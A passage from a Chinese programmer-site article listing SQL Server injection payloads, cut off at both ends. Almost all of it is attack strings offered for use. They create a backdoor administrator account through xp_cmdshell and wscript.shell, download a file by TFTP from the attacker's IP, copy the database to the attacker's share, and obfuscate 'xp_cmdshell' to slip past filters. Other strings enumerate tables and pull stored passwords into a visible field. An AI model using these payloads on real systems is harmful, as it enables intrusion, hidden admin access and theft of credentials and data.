欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  数据库

常用SQL注射语句解析(3)_MySQL

程序员文章站 2024-01-08 19:48:16
...
bitsCN.com

aths(path)

  values(@test)--

  ;use ku1;--

  ;create table cmd (str image);-- 建立image类型的表cmd

  存在xp_cmdshell的测试过程:

  ;exec master..xp_cmdshell 'dir'

  ;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号

  ;exec master.dbo.sp_password null,jiaoniang$,1866574;--

  ;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--

  ;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:*

  /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

  ;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$

  /add';--

  exec master..xp_servicecontrol 'start', 'schedule' 启动服务

  exec master..xp_servicecontrol 'start', 'server'

  ; DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

  SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user

  jiaoniang$ 1866574 /add'

  ;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

  SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net

  localgroup administrators jiaoniang$ /add'

  '; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- 利用TFTP上传文件

  ;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/'

  ;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:/'

  ;declare @a;set @a=db_name();backup database @a to

  disk='你的IP你的共享目录bak.dat'

  如果被限制则可以。

  select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec

  master.dbo.sp_addlogin hax')

  查询构造:

  Select * FROM news Where id=... AND topic=... AND .....

  admin'and 1=(select count(*) from [user] where username='victim' and

  right(left(userpass,01),1)='1') and userpass '

  select 123;--

  ;use master;--

  :a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。

  and 1(select count(email) from [user]);--

  ;update [users] set email=(select top 1 name from sysobjects where

  xtype='u' and status>0) where name='ffff';--

  ;update [users] set email=(select top 1 id from sysobjects where xtype='u'

  and name='ad') where name='ffff';--

  ';update [users] set email=(select top 1 name from sysobjects where

  xtype='u' and id>581577110) where name='ffff';--

  ';update [users] set email=(select top 1 count(id) from password) where

  name='ffff';--

  ';update [users] set email=(select top 1 pwd from password where id=2)

  where name='ffff';--

  ';update [users] set email=(select top 1 name from password where id=2)

  where name='ffff';--

  上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。

  通过查看ffff的用户资料可得第一个用表叫ad

  然后根据表名ad得到这个表的ID 得到第二个表的名字

  insert into users values( 666,

  char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),

  char(0x63)+char(0x68)+char(0x72)+c

bitsCN.com
相关标签: test values